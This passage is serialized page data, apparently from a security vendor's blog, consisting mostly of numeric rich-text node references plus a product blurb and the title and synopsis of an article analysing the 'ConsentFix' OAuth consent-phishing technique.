"value":28349,"nodeType":864},{},[],{"data":30898,"content":30899,"nodeType":860},{},[30900],{"data":30901,"marks":30902,"value":30903,"nodeType":864},{},[],"This isn’t all we do: Push’s browser-based security platform provides comprehensive detection and response capabilities against the leading cause of breaches. Push blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, and session hijacking. You don’t need to wait until it all goes wrong — you can also use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your identity attack surface.",{"data":30905,"content":30906,"nodeType":860},{},[30907,30910,30917,30920,30927],{"data":30908,"marks":30909,"value":16314,"nodeType":864},{},[],{"data":30911,"content":30912,"nodeType":883},{"uri":10269},[30913],{"data":30914,"marks":30915,"value":10275,"nodeType":864},{},[30916],{"type":1455},{"data":30918,"marks":30919,"value":19754,"nodeType":864},{},[],{"data":30921,"content":30922,"nodeType":883},{"uri":1700},[30923],{"data":30924,"marks":30925,"value":10299,"nodeType":864},{},[30926],{"type":1455},{"data":30928,"marks":30929,"value":2924,"nodeType":864},{},[],{"data":30931,"content":30934,"nodeType":996},{"target":30932},{"sys":30933},{"id":27224,"type":1001,"linkType":1002},[],{"data":30936,"content":30937,"nodeType":860},{},[30938],{"data":30939,"marks":30940,"value":21,"nodeType":864},{},[],"ConsentFix: Analyzing a browser-native ClickFix-style attack that hijacks OAuth consent grants","Analyzing \"ConsentFix\", a new browser-native attack technique we've detected in the wild, combining OAuth consent phishing with a ClickFix-style user prompt. ","2025-12-11T00:00:00.000Z","consentfix",{"items":30946},[30947,30949],{"sys":30948,"name":6593},{"id":6592},{"sys":30950,"name":342},{"id":6596},{"items":30952},[30953],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":30954},{"url":4955},{"__typename":2059,"sys":30956,"content":30957,"title":29375,"synopsis":29376,"hashTags":59,"publishedDate":28784,"slug":29377,"tagsCollection":31465,"authorsCollection":31471},{"id":28798},{"json":30958},{"data":30959,"content":30960,"nodeType":856},{},[30961,30967,30973,30979,30984,30990,30993,31000,31006,31012,31018,31023,31029,31034,31040,31045,31051,31056,31082,31088,31093,31099,31104,31110,31115,31121,31160,31163,31170,31176,31182,31188,31193,31196,31203,31209,31225,31230,31235,31240,31246,31251,31256,31272,31275,31282,31298,31303,31309,31325,31332,31338,31344,31350,31366,31373,31379,31384,31387,31394,31400,31406,31409,31416,31422,31428,31454,31459],{"data":30962,"content":30963,"nodeType":860},{},[30964],{"data":30965,"marks":30966,"value":28809,"nodeType":864},{},[],{"data":30968,"content":30969,"nodeType":860},{},[30970],{"data":30971,"marks":30972,"value":28816,"nodeType":864},{},[],{"data":30974,"content":30975,"nodeType":860},{},[30976],{"data":30977,"marks":30978,"value":28823,"nodeType":864},{},[],{"data":30980,"content":30983,"nodeType":996},{"target":30981},{"sys":30982},{"id":28828,"type":1001,"linkType":1002},[],{"data":30985,"content":30986,"nodeType":860},{},[30987],{"data":30988,"marks":30989,"value":28836,"nodeType":864},{},[],{"data":30991,"content":30992,"nodeType":1005},{},[],{"data":30994,"content":30995,"nodeType":1009},{},[30996],{"data":30997,"marks":30998,"value":28847,"nodeType":864},{},[30999],{"type":899},{"data":31001,"content":31002,"nodeType":860},{},[31003],{"data":31004,"marks":31005,"value":28854,"nodeType":864},{},[],{"data":31007,"content":31008,"nodeType":860},{},[31009],{"data":31010,"marks":31011,"value":28861,"nodeType":864},{},[],{"data":31013,"content":31014,"nodeType":860},{},[31015],{"data":31016,"marks":31017,"value":28868,"nodeType":864},{},[],{"data":31019,"content":31022,"nodeType":996},{"target":31020},{"sys":31021},{"id":28873,"type":1001,"linkType":1002},[],{"data":31024,"content":31025,"nodeType":860},{},[31026],{"data":31027,"marks":31028,"value":28881,"nodeType":864},{},[],{"data":31030,"content":31033,"nodeType":996},{"target":31031},{"sys":31032},{"id":28886,"type":1001,"linkType":1002},[],{"data":31035,"content":31036,"nodeType":860},{},[31037],{"data":31038,"marks":31039,"value":28894,"nodeType":864},{},[],{"data":31041,"content":31044,"nodeType":996},{"target":31042},{"sys":31043},{"id":28899,"type":1001,"linkType":1002},[],{"data":31046,"content":31047,"nodeType":860},{},[31048],{"data":31049,"marks":31050,"value":28907,"nodeType":864},{},[],{"data":31052,"content":31055,"nodeType":996},{"target":31053},{"sys":31054},{"id":28912,"type":1001,"linkType":1002},[],{"data":31057,"content":31058,"nodeType":860},{},[31059,31062,31069,31072,31079],{"data":31060,"marks":31061,"value":28920,"nodeType":864},{},[],{"data":31063,"content":31064,"nodeType":883},{"uri":26883},[31065],{"data":31066,"marks":31067,"value":28928,"nodeType":864},{},[31068],{"type":1455},{"data":31070,"marks":31071,"value":28932,"nodeType":864},{},[],{"data":31073,"content":31074,"nodeType":883},{"uri":7124},[31075],{"data":31076,"marks":31077,"value":7129,"nodeType":864},{},[31078],{"type":1455},{"data":31080,"marks":31081,"value":28943,"nodeType":864},{},[],{"data":31083,"content":31084,"nodeType":860},{},[31085],{"data":31086,"marks":31087,"value":28950,"nodeType":864},{},[],{"data":31089,"content":31092,"nodeType":996},{"target":31090},{"sys":31091},{"id":28955,"type":1001,"linkType":1002},[],{"data":31094,"content":31095,"nodeType":860},{},[31096],{"data":31097,"marks":31098,"value":28963,"nodeType":864},{},[],{"data":31100,"content":31103,"nodeType":996},{"target":31101},{"sys":31102},{"id":28968,"type":1001,"linkType":1002},[],{"data":31105,"content":31106,"nodeType":860},{},[31107],{"data":31108,"marks":31109,"value":28976,"nodeType":864},{},[],{"data":31111,"content":31114,"nodeType":996},{"target":31112},{"sys":31113},{"id":28981,"type":1001,"linkType":1002},[],{"data":31116,"content":31117,"nodeType":860},{},[31118],{"data":31119,"marks":31120,"value":28989,"nodeType":864},{},[],{"data":31122,"content":31123,"nodeType":941},{},[31124,31133,31142,31151],{"data":31125,"content":31126,"nodeType":945},{},[31127],{"data":31128,"content":31129,"nodeType":860},{},[31130],{"data":31131,"marks":31132,"value":29002,"nodeType":864},{},[],{"data":31134,"content":31135,"nodeType":945},{},[31136],{"data":31137,"content":31138,"nodeType":860},{},[31139],{"data":31140,"marks":31141,"value":29012,"nodeType":864},{},[],{"data":31143,"content":31144,"nodeType":945},{},[31145],{"data":31146,"content":31147,"nodeType":860},{},[31148],{"data":31149,"marks":31150,"value":29022,"nodeType":864},{},[],{"data":31152,"content":31153,"nodeType":945},{},[31154],{"data":31155,"content":31156,"nodeType":860},{},[31157],{"data":31158,"marks":31159,"value":29032,"nodeType":864},{},[],{"data":31161,"content":31162,"nodeType":1005},{},[],{"data":31164,"content":31165,"nodeType":1009},{},[31166],{"data":31167,"marks":31168,"value":29043,"nodeType":864},{},[31169],{"type":899},{"data":31171,"content":31172,"nodeType":860},{},[31173],{"data":31174,"marks":31175,"value":29050,"nodeType":864},{},[],{"data":31177,"content":31178,"nodeType":860},{},[31179],{"data":31180,"marks":31181,"value":29057,"nodeType":864},{},[],{"data":31183,"content":31184,"nodeType":860},{},[31185],{"data":31186,"marks":31187,"value":29064,"nodeType":864},{},[],{"data":31189,"content":31192,"nodeType":996},{"target":31190},{"sys":31191},{"id":29069,"type":1001,"linkType":1002},[],{"data":31194,"content":31195,"nodeType":1005},{},[],{"data":31197,"content":31198,"nodeType":1009},{},[31199],{"data":31200,"marks":31201,"value":29081,"nodeType":864},{},[31202],{"type":899},{"data":31204,"content":31205,"nodeType":860},{},[31206],{"data":31207,"marks":31208,"value":29088,"nodeType":864},{},[],{"data":31210,"content":31211,"nodeType":860},{},[31212,31215,31222],{"data":31213,"marks":31214,"value":29095,"nodeType":864},{},[],{"data":31216,"content":31217,"nodeType":883},{"uri":29098},[31218],{"data":31219,"marks":31220,"value":29104,"nodeType":864},{},[31221],{"type":1455},{"data":31223,"marks":31224,"value":29108,"nodeType":864},{},[],{"data":31226,"content":31229,"nodeType":996},{"target":31227},{"sys":31228},{"id":29113,"type":1001,"linkType":1002},[],{"data":31231,"content":31234,"nodeType":996},{"target":31232},{"sys":31233},{"id":29119,"type":1001,"linkType":1002},[],{"data":31236,"content":31239,"nodeType":996},{"target":31237},{"sys":31238},{"id":29125,"type":1001,"linkType":1002},[],{"data":31241,"content":31242,"nodeType":860},{},[31243],{"data":31244,"marks":31245,"value":29133,"nodeType":864},{},[],{"data":31247,"content":31250,"nodeType":996},{"target":31248},{"sys":31249},{"id":29138,"type":1001,"linkType":1002},[],{"data":31252,"content":31255,"nodeType":996},{"target":31253},{"sys":31254},{"id":29144,"type":1001,"linkType":1002},[],{"data":31257,"content":31258,"nodeType":860},{},[31259,31262,31269],{"data":31260,"marks":31261,"value":29152,"nodeType":864},{},[],{"data":31263,"content":31264,"nodeType":883},{"uri":29155},[31265],{"data":31266,"marks":31267,"value":29161,"nodeType":864},{},[31268],{"type":1455},{"data":31270,"marks":31271,"value":29165,"nodeType":864},{},[],{"data":31273,"content":31274,"nodeType":1005},{},[],{"data":31276,"content":31277,"nodeType":1009},{},[31278],{"data":31279,"marks":31280,"value":29176,"nodeType":864},{},[31281],{"type":899},{"data":31283,"content":31284,"nodeType":860},{},[31285,31288,31295],{"data":31286,"marks":31287,"value":29183,"nodeType":864},{},[],{"data":31289,"content":31290,"nodeType":883},{"uri":29186},[31291],{"data":31292,"marks":31293,"value":13810,"nodeType":864},{},[31294],{"type":1455},{"data":31296,"marks":31297,"value":29195,"nodeType":864},{},[],{"data":31299,"content":31302,"nodeType":996},{"target":31300},{"sys":31301},{"id":29200,"type":1001,"linkType":1002},[],{"data":31304,"content":31305,"nodeType":860},{},[31306],{"data":31307,"marks":31308,"value":29208,"nodeType":864},{},[],{"data":31310,"content":31311,"nodeType":860},{},[31312,31315,31322],{"data":31313,"marks":31314,"value":28577,"nodeType":864},{},[],{"data":31316,"content":31317,"nodeType":883},{"uri":13019},[31318],{"data":31319,"marks":31320,"value":315,"nodeType":864},{},[31321],{"type":1455},{"data":31323,"marks":31324,"value":28588,"nodeType":864},{},[],{"data":31326,"content":31327,"nodeType":1312},{},[31328],{"data":31329,"marks":31330,"value":29232,"nodeType":864},{},[31331],{"type":899},{"data":31333,"content":31334,"nodeType":860},{},[31335],{"data":31336,"marks":31337,"value":29239,"nodeType":864},{},[],{"data":31339,"content":31340,"nodeType":860},{},[31341],{"data":31342,"marks":31343,"value":29246,"nodeType":864},{},[],{"data":31345,"content":31346,"nodeType":860},{},[31347],{"data":31348,"marks":31349,"value":28556,"nodeType":864},{},[],{"data":31351,"content":31352,"nodeType":860},{},[31353,31356,31363],{"data":31354,"marks":31355,"value":29259,"nodeType":864},{},[],{"data":31357,"content":31358,"nodeType":883},{"uri":6237},[31359],{"data":31360,"marks":31361,"value":6242,"nodeType":864},{},[31362],{"type":1455},{"data":31364,"marks":31365,"value":29270,"nodeType":864},{},[],{"data":31367,"content":31368,"nodeType":1312},{},[31369],{"data":31370,"marks":31371,"value":29278,"nodeType":864},{},[31372],{"type":899},{"data":31374,"content":31375,"nodeType":860},{},[31376],{"data":31377,"marks":31378,"value":29285,"nodeType":864},{},[],{"data":31380,"content":31383,"nodeType":996},{"target":31381},{"sys":31382},{"id":29290,"type":1001,"linkType":1002},[],{"data":31385,"content":31386,"nodeType":1005},{},[],{"data":31388,"content":31389,"nodeType":1009},{},[31390],{"data":31391,"marks":31392,"value":5571,"nodeType":864},{},[31393],{"type":899},{"data":31395,"content":31396,"nodeType":860},{},[31397],{"data":31398,"marks":31399,"value":29308,"nodeType":864},{},[],{"data":31401,"content":31402,"nodeType":860},{},[31403],{"data":31404,"marks":31405,"value":28714,"nodeType":864},{},[],{"data":31407,"content":31408,"nodeType":1005},{},[],{"data":31410,"content":31411,"nodeType":1009},{},[31412],{"data":31413,"marks":31414,"value":3578,"nodeType":864},{},[31415],{"type":899},{"data":31417,"content":31418,"nodeType":860},{},[31419],{"data":31420,"marks":31421,"value":29331,"nodeType":864},{},[],{"data":31423,"content":31424,"nodeType":860},{},[31425],{"data":31426,"marks":31427,"value":19737,"nodeType":864},{},[],{"data":31429,"content":31430,"nodeType":860},{},[31431,31434,31441,31444,31451],{"data":31432,"marks":31433,"value":16314,"nodeType":864},{},[],{"data":31435,"content":31436,"nodeType":883},{"uri":10269},[31437],{"data":31438,"marks":31439,"value":10275,"nodeType":864},{},[31440],{"type":1455},{"data":31442,"marks":31443,"value":19754,"nodeType":864},{},[],{"data":31445,"content":31446,"nodeType":883},{"uri":1700},[31447],{"data":31448,"marks":31449,"value":10299,"nodeType":864},{},[31450],{"type":1455},{"data":31452,"marks":31453,"value":2924,"nodeType":864},{},[],{"data":31455,"content":31458,"nodeType":996},{"target":31456},{"sys":31457},{"id":27224,"type":1001,"linkType":1002},[],{"data":31460,"content":31461,"nodeType":860},{},[31462],{"data":31463,"marks":31464,"value":21,"nodeType":864},{},[],{"items":31466},[31467,31469],{"sys":31468,"name":6593},{"id":6592},{"sys":31470,"name":342},{"id":6596},{"items":31472},[31473],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":31474},{"url":4955},{"__typename":2059,"sys":31476,"content":31477,"title":19765,"synopsis":19766,"hashTags":59,"publishedDate":19767,"slug":19768,"tagsCollection":32293,"authorsCollection":32299},{"id":18820},{"json":31478},{"data":31479,"content":31480,"nodeType":856},{},[31481,31487,31493,31499,31502,31509,31515,31521,31526,31532,31537,31553,31559,31569,31572,31579,31585,31598,31604,31614,31619,31622,31629,31636,31641,31649,31665,31673,31679,31687,31702,31710,31716,31724,31750,31758,31764,31772,31788,31793,31801,31807,31815,31848,31851,31858,31866,31882,31890,31896,31904,31930,31935,31943,31949,31954,31957,31964,31972,31978,32029,32034,32037,32044,32052,32058,32063,32066,32073,32079,32085,32145,32151,32206,32212,32215,32222,32228,32234,32239,32242,32249,32255,32261,32267],{"data":31482,"content":31483,"nodeType":860},{},[31484],{"data":31485,"marks":31486,"value":18831,"nodeType":864},{},[],{"data":31488,"content":31489,"nodeType":860},{},[31490],{"data":31491,"marks":31492,"value":18838,"nodeType":864},{},[],{"data":31494,"content":31495,"nodeType":860},{},[31496],{"data":31497,"marks":31498,"value":18845,"nodeType":864},{},[],{"data":31500,"content":31501,"nodeType":1005},{},[],{"data":31503,"content":31504,"nodeType":1009},{},[31505],{"data":31506,"marks":31507,"value":18856,"nodeType":864},{},[31508],{"type":899},{"data":31510,"content":31511,"nodeType":860},{},[31512],{"data":31513,"marks":31514,"value":18863,"nodeType":864},{},[],{"data":31516,"content":31517,"nodeType":860},{},[31518],{"data":31519,"marks":31520,"value":18870,"nodeType":864},{},[],{"data":31522,"content":31525,"nodeType":996},{"target":31523},{"sys":31524},{"id":18875,"type":1001,"linkType":1002},[],{"data":31527,"content":31528,"nodeType":860},{},[31529],{"data":31530,"marks":31531,"value":18883,"nodeType":864},{},[],{"data":31533,"content":31536,"nodeType":996},{"target":31534},{"sys":31535},{"id":18888,"type":1001,"linkType":1002},[],{"data":31538,"content":31539,"nodeType":860},{},[31540,31543,31550],{"data":31541,"marks":31542,"value":18896,"nodeType":864},{},[],{"data":31544,"content":31545,"nodeType":883},{"uri":17177},[31546],{"data":31547,"marks":31548,"value":18904,"nodeType":864},{},[31549],{"type":1455},{"data":31551,"marks":31552,"value":18908,"nodeType":864},{},[],{"data":31554,"content":31555,"nodeType":860},{},[31556],{"data":31557,"marks":31558,"value":18915,"nodeType":864},{},[],{"data":31560,"content":31561,"nodeType":860},{},[31562,31565],{"data":31563,"marks":31564,"value":18922,"nodeType":864},{},[],{"data":31566,"marks":31567,"value":18927,"nodeType":864},{},[31568],{"type":899},{"data":31570,"content":31571,"nodeType":1005},{},[],{"data":31573,"content":31574,"nodeType":1009},{},[31575],{"data":31576,"marks":31577,"value":18938,"nodeType":864},{},[31578],{"type":899},{"data":31580,"content":31581,"nodeType":860},{},[31582],{"data":31583,"marks":31584,"value":18945,"nodeType":864},{},[],{"data":31586,"content":31587,"nodeType":860},{},[31588,31591,31595],{"data":31589,"marks":31590,"value":18952,"nodeType":864},{},[],{"data":31592,"marks":31593,"value":18957,"nodeType":864},{},[31594],{"type":899},{"data":31596,"marks":31597,"value":18961,"nodeType":864},{},[],{"data":31599,"content":31600,"nodeType":860},{},[31601],{"data":31602,"marks":31603,"value":18968,"nodeType":864},{},[],{"data":31605,"content":31606,"nodeType":860},{},[31607,31610],{"data":31608,"marks":31609,"value":18975,"nodeType":864},{},[],{"data":31611,"marks":31612,"value":18980,"nodeType":864},{},[31613],{"type":899},{"data":31615,"content":31618,"nodeType":996},{"target":31616},{"sys":31617},{"id":18985,"type":1001,"linkType":1002},[],{"data":31620,"content":31621,"nodeType":1005},{},[],{"data":31623,"content":31624,"nodeType":1009},{},[31625],{"data":31626,"marks":31627,"value":18997,"nodeType":864},{},[31628],{"type":899},{"data":31630,"content":31631,"nodeType":1312},{},[31632],{"data":31633,"marks":31634,"value":19005,"nodeType":864},{},[31635],{"type":899},{"data":31637,"content":31640,"nodeType":996},{"target":31638},{"sys":31639},{"id":19010,"type":1001,"linkType":1002},[],{"data":31642,"content":31643,"nodeType":860},{},[31644],{"data":31645,"marks":31646,"value":19020,"nodeType":864},{},[31647,31648],{"type":899},{"type":1455},{"data":31650,"content":31651,"nodeType":860},{},[31652,31655,31662],{"data":31653,"marks":31654,"value":19027,"nodeType":864},{},[],{"data":31656,"content":31657,"nodeType":883},{"uri":19030},[31658],{"data":31659,"marks":31660,"value":19036,"nodeType":864},{},[31661],{"type":1455},{"data":31663,"marks":31664,"value":19040,"nodeType":864},{},[],{"data":31666,"content":31667,"nodeType":860},{},[31668],{"data":31669,"marks":31670,"value":19049,"nodeType":864},{},[31671,31672],{"type":899},{"type":1455},{"data":31674,"content":31675,"nodeType":860},{},[31676],{"data":31677,"marks":31678,"value":19056,"nodeType":864},{},[],{"data":31680,"content":31681,"nodeType":860},{},[31682],{"data":31683,"marks":31684,"value":19065,"nodeType":864},{},[31685,31686],{"type":899},{"type":1455},{"data":31688,"content":31689,"nodeType":860},{},[31690,31693,31699],{"data":31691,"marks":31692,"value":19072,"nodeType":864},{},[],{"data":31694,"content":31695,"nodeType":883},{"uri":19075},[31696],{"data":31697,"marks":31698,"value":19080,"nodeType":864},{},[],{"data":31700,"marks":31701,"value":19084,"nodeType":864},{},[],{"data":31703,"content":31704,"nodeType":860},{},[31705],{"data":31706,"marks":31707,"value":19093,"nodeType":864},{},[31708,31709],{"type":899},{"type":1455},{"data":31711,"content":31712,"nodeType":860},{},[31713],{"data":31714,"marks":31715,"value":19100,"nodeType":864},{},[],{"data":31717,"content":31718,"nodeType":860},{},[31719],{"data":31720,"marks":31721,"value":19109,"nodeType":864},{},[31722,31723],{"type":899},{"type":1455},{"data":31725,"content":31726,"nodeType":860},{},[31727,31730,31737,31740,31747],{"data":31728,"marks":31729,"value":19116,"nodeType":864},{},[],{"data":31731,"content":31732,"nodeType":883},{"uri":3751},[31733],{"data":31734,"marks":31735,"value":19124,"nodeType":864},{},[31736],{"type":1455},{"data":31738,"marks":31739,"value":19128,"nodeType":864},{},[],{"data":31741,"content":31742,"nodeType":883},{"uri":19131},[31743],{"data":31744,"marks":31745,"value":19137,"nodeType":864},{},[31746],{"type":1455},{"data":31748,"marks":31749,"value":19141,"nodeType":864},{},[],{"data":31751,"content":31752,"nodeType":860},{},[31753],{"data":31754,"marks":31755,"value":19150,"nodeType":864},{},[31756,31757],{"type":899},{"type":1455},{"data":31759,"content":31760,"nodeType":860},{},[31761],{"data":31762,"marks":31763,"value":19157,"nodeType":864},{},[],{"data":31765,"content":31766,"nodeType":860},{},[31767],{"data":31768,"marks":31769,"value":19166,"nodeType":864},{},[31770,31771],{"type":899},{"type":1455},{"data":31773,"content":31774,"nodeType":860},{},[31775,31778,31785],{"data":31776,"marks":31777,"value":19173,"nodeType":864},{},[],{"data":31779,"content":31780,"nodeType":883},{"uri":19131},[31781],{"data":31782,"marks":31783,"value":19137,"nodeType":864},{},[31784],{"type":1455},{"data":31786,"marks":31787,"value":19184,"nodeType":864},{},[],{"data":31789,"content":31792,"nodeType":996},{"target":31790},{"sys":31791},{"id":19189,"type":1001,"linkType":1002},[],{"data":31794,"content":31795,"nodeType":860},{},[31796],{"data":31797,"marks":31798,"value":19199,"nodeType":864},{},[31799,31800],{"type":899},{"type":1455},{"data":31802,"content":31803,"nodeType":860},{},[31804],{"data":31805,"marks":31806,"value":19206,"nodeType":864},{},[],{"data":31808,"content":31809,"nodeType":860},{},[31810],{"data":31811,"marks":31812,"value":19215,"nodeType":864},{},[31813,31814],{"type":899},{"type":1455},{"data":31816,"content":31817,"nodeType":860},{},[31818,31821,31827,31830,31836,31839,31845],{"data":31819,"marks":31820,"value":19222,"nodeType":864},{},[],{"data":31822,"content":31823,"nodeType":883},{"uri":19225},[31824],{"data":31825,"marks":31826,"value":19230,"nodeType":864},{},[],{"data":31828,"marks":31829,"value":902,"nodeType":864},{},[],{"data":31831,"content":31832,"nodeType":883},{"uri":19236},[31833],{"data":31834,"marks":31835,"value":19241,"nodeType":864},{},[],{"data":31837,"marks":31838,"value":19245,"nodeType":864},{},[],{"data":31840,"content":31841,"nodeType":883},{"uri":6259},[31842],{"data":31843,"marks":31844,"value":19252,"nodeType":864},{},[],{"data":31846,"marks":31847,"value":19256,"nodeType":864},{},[],{"data":31849,"content":31850,"nodeType":1005},{},[],{"data":31852,"content":31853,"nodeType":1312},{},[31854],{"data":31855,"marks":31856,"value":19267,"nodeType":864},{},[31857],{"type":899},{"data":31859,"content":31860,"nodeType":860},{},[31861],{"data":31862,"marks":31863,"value":19276,"nodeType":864},{},[31864,31865],{"type":899},{"type":1455},{"data":31867,"content":31868,"nodeType":860},{},[31869,31872,31879],{"data":31870,"marks":31871,"value":19283,"nodeType":864},{},[],{"data":31873,"content":31874,"nodeType":883},{"uri":19286},[31875],{"data":31876,"marks":31877,"value":19292,"nodeType":864},{},[31878],{"type":1455},{"data":31880,"marks":31881,"value":19296,"nodeType":864},{},[],{"data":31883,"content":31884,"nodeType":860},{},[31885],{"data":31886,"marks":31887,"value":19305,"nodeType":864},{},[31888,31889],{"type":899},{"type":1455},{"data":31891,"content":31892,"nodeType":860},{},[31893],{"data":31894,"marks":31895,"value":19312,"nodeType":864},{},[],{"data":31897,"content":31898,"nodeType":860},{},[31899],{"data":31900,"marks":31901,"value":19321,"nodeType":864},{},[31902,31903],{"type":899},{"type":1455},{"data":31905,"content":31906,"nodeType":860},{},[31907,31910,31917,31920,31927],{"data":31908,"marks":31909,"value":19328,"nodeType":864},{},[],{"data":31911,"content":31912,"nodeType":883},{"uri":19331},[31913],{"data":31914,"marks":31915,"value":19337,"nodeType":864},{},[31916],{"type":1455},{"data":31918,"marks":31919,"value":19341,"nodeType":864},{},[],{"data":31921,"content":31922,"nodeType":883},{"uri":19344},[31923],{"data":31924,"marks":31925,"value":19350,"nodeType":864},{},[31926],{"type":1455},{"data":31928,"marks":31929,"value":19354,"nodeType":864},{},[],{"data":31931,"content":31934,"nodeType":996},{"target":31932},{"sys":31933},{"id":19359,"type":1001,"linkType":1002},[],{"data":31936,"content":31937,"nodeType":860},{},[31938],{"data":31939,"marks":31940,"value":19369,"nodeType":864},{},[31941,31942],{"type":899},{"type":1455},{"data":31944,"content":31945,"nodeType":860},{},[31946],{"data":31947,"marks":31948,"value":19376,"nodeType":864},{},[],{"data":31950,"content":31953,"nodeType":996},{"target":31951},{"sys":31952},{"id":19381,"type":1001,"linkType":1002},[],{"data":31955,"content":31956,"nodeType":1005},{},[],{"data":31958,"content":31959,"nodeType":1312},{},[31960],{"data":31961,"marks":31962,"value":694,"nodeType":864},{},[31963],{"type":899},{"data":31965,"content":31966,"nodeType":860},{},[31967],{"data":31968,"marks":31969,"value":19401,"nodeType":864},{},[31970,31971],{"type":899},{"type":1455},{"data":31973,"content":31974,"nodeType":860},{},[31975],{"data":31976,"marks":31977,"value":19408,"nodeType":864},{},[],{"data":31979,"content":31980,"nodeType":941},{},[31981,31994,32007],{"data":31982,"content":31983,"nodeType":945},{},[31984],{"data":31985,"content":31986,"nodeType":860},{},[31987,31991],{"data":31988,"marks":31989,"value":19422,"nodeType":864},{},[31990],{"type":899},{"data":31992,"marks":31993,"value":19426,"nodeType":864},{},[],{"data":31995,"content":31996,"nodeType":945},{},[31997],{"data":31998,"content":31999,"nodeType":860},{},[32000,32004],{"data":32001,"marks":32002,"value":19437,"nodeType":864},{},[32003],{"type":899},{"data":32005,"marks":32006,"value":19441,"nodeType":864},{},[],{"data":32008,"content":32009,"nodeType":945},{},[32010],{"data":32011,"content":32012,"nodeType":860},{},[32013,32017,32020,32026],{"data":32014,"marks":32015,"value":19452,"nodeType":864},{},[32016],{"type":899},{"data":32018,"marks":32019,"value":19456,"nodeType":864},{},[],{"data":32021,"content":32022,"nodeType":883},{"uri":19459},[32023],{"data":32024,"marks":32025,"value":19464,"nodeType":864},{},[],{"data":32027,"marks":32028,"value":19468,"nodeType":864},{},[],{"data":32030,"content":32033,"nodeType":996},{"target":32031},{"sys":32032},{"id":19473,"type":1001,"linkType":1002},[],{"data":32035,"content":32036,"nodeType":1005},{},[],{"data":32038,"content":32039,"nodeType":1312},{},[32040],{"data":32041,"marks":32042,"value":699,"nodeType":864},{},[32043],{"type":899},{"data":32045,"content":32046,"nodeType":860},{},[32047],{"data":32048,"marks":32049,"value":19493,"nodeType":864},{},[32050,32051],{"type":899},{"type":1455},{"data":32053,"content":32054,"nodeType":860},{},[32055],{"data":32056,"marks":32057,"value":19500,"nodeType":864},{},[],{"data":32059,"content":32062,"nodeType":996},{"target":32060},{"sys":32061},{"id":19505,"type":1001,"linkType":1002},[],{"data":32064,"content":32065,"nodeType":1005},{},[],{"data":32067,"content":32068,"nodeType":1009},{},[32069],{"data":32070,"marks":32071,"value":5520,"nodeType":864},{},[32072],{"type":899},{"data":32074,"content":32075,"nodeType":860},{},[32076],{"data":32077,"marks":32078,"value":19523,"nodeType":864},{},[],{"data":32080,"content":32081,"nodeType":860},{},[32082],{"data":32083,"marks":32084,"value":19530,"nodeType":864},{},[],{"data":32086,"content":32087,"nodeType":941},{},[32088,32107,32126],{"data":32089,"content":32090,"nodeType":945},{},[32091],{"data":32092,"content":32093,"nodeType":860},{},[32094,32097,32104],{"data":32095,"marks":32096,"value":19543,"nodeType":864},{},[],{"data":32098,"content":32099,"nodeType":883},{"uri":19546},[32100],{"data":32101,"marks":32102,"value":13585,"nodeType":864},{},[32103],{"type":1455},{"data":32105,"marks":32106,"value":10724,"nodeType":864},{},[],{"data":32108,"content":32109,"nodeType":945},{},[32110],{"data":32111,"content":32112,"nodeType":860},{},[32113,32116,32123],{"data":32114,"marks":32115,"value":19564,"nodeType":864},{},[],{"data":32117,"content":32118,"nodeType":883},{"uri":19567},[32119],{"data":32120,"marks":32121,"value":19573,"nodeType":864},{},[32122],{"type":1455},{"data":32124,"marks":32125,"value":10724,"nodeType":864},{},[],{"data":32127,"content":32128,"nodeType":945},{},[32129],{"data":32130,"content":32131,"nodeType":860},{},[32132,32135,32142],{"data":32133,"marks":32134,"value":19586,"nodeType":864},{},[],{"data":32136,"content":32137,"nodeType":883},{"uri":19589},[32138],{"data":32139,"marks":32140,"value":19595,"nodeType":864},{},[32141],{"type":1455},{"data":32143,"marks":32144,"value":10724,"nodeType":864},{},[],{"data":32146,"content":32147,"nodeType":860},{},[32148],{"data":32149,"marks":32150,"value":19605,"nodeType":864},{},[],{"data":32152,"content":32153,"nodeType":941},{},[32154,32167,32180,32193],{"data":32155,"content":32156,"nodeType":945},{},[32157],{"data":32158,"content":32159,"nodeType":860},{},[32160,32164],{"data":32161,"marks":32162,"value":19619,"nodeType":864},{},[32163],{"type":899},{"data":32165,"marks":32166,"value":19623,"nodeType":864},{},[],{"data":32168,"content":32169,"nodeType":945},{},[32170],{"data":32171,"content":32172,"nodeType":860},{},[32173,32177],{"data":32174,"marks":32175,"value":19634,"nodeType":864},{},[32176],{"type":899},{"data":32178,"marks":32179,"value":19638,"nodeType":864},{},[],{"data":32181,"content":32182,"nodeType":945},{},[32183],{"data":32184,"content":32185,"nodeType":860},{},[32186,32190],{"data":32187,"marks":32188,"value":19649,"nodeType":864},{},[32189],{"type":899},{"data":32191,"marks":32192,"value":19653,"nodeType":864},{},[],{"data":32194,"content":32195,"nodeType":945},{},[32196],{"data":32197,"content":32198,"nodeType":860},{},[32199,32203],{"data":32200,"marks":32201,"value":19664,"nodeType":864},{},[32202],{"type":899},{"data":32204,"marks":32205,"value":19668,"nodeType":864},{},[],{"data":32207,"content":32208,"nodeType":860},{},[32209],{"data":32210,"marks":32211,"value":19675,"nodeType":864},{},[],{"data":32213,"content":32214,"nodeType":1005},{},[],{"data":32216,"content":32217,"nodeType":1009},{},[32218],{"data":32219,"marks":32220,"value":19686,"nodeType":864},{},[32221],{"type":899},{"data":32223,"content":32224,"nodeType":860},{},[32225],{"data":32226,"marks":32227,"value":19693,"nodeType":864},{},[],{"data":32229,"content":32230,"nodeType":860},{},[32231],{"data":32232,"marks":32233,"value":19700,"nodeType":864},{},[],{"data":32235,"content":32238,"nodeType":996},{"target":32236},{"sys":32237},{"id":19705,"type":1001,"linkType":1002},[],{"data":32240,"content":32241,"nodeType":1005},{},[],{"data":32243,"content":32244,"nodeType":1009},{},[32245],{"data":32246,"marks":32247,"value":17636,"nodeType":864},{},[32248],{"type":899},{"data":32250,"content":32251,"nodeType":860},{},[32252],{"data":32253,"marks":32254,"value":19723,"nodeType":864},{},[],{"data":32256,"content":32257,"nodeType":860},{},[32258],{"data":32259,"marks":32260,"value":19730,"nodeType":864},{},[],{"data":32262,"content":32263,"nodeType":860},{},[32264],{"data":32265,"marks":32266,"value":19737,"nodeType":864},{},[],{"data":32268,"content":32269,"nodeType":860},{},[32270,32273,32280,32283,32290],{"data":32271,"marks":32272,"value":16314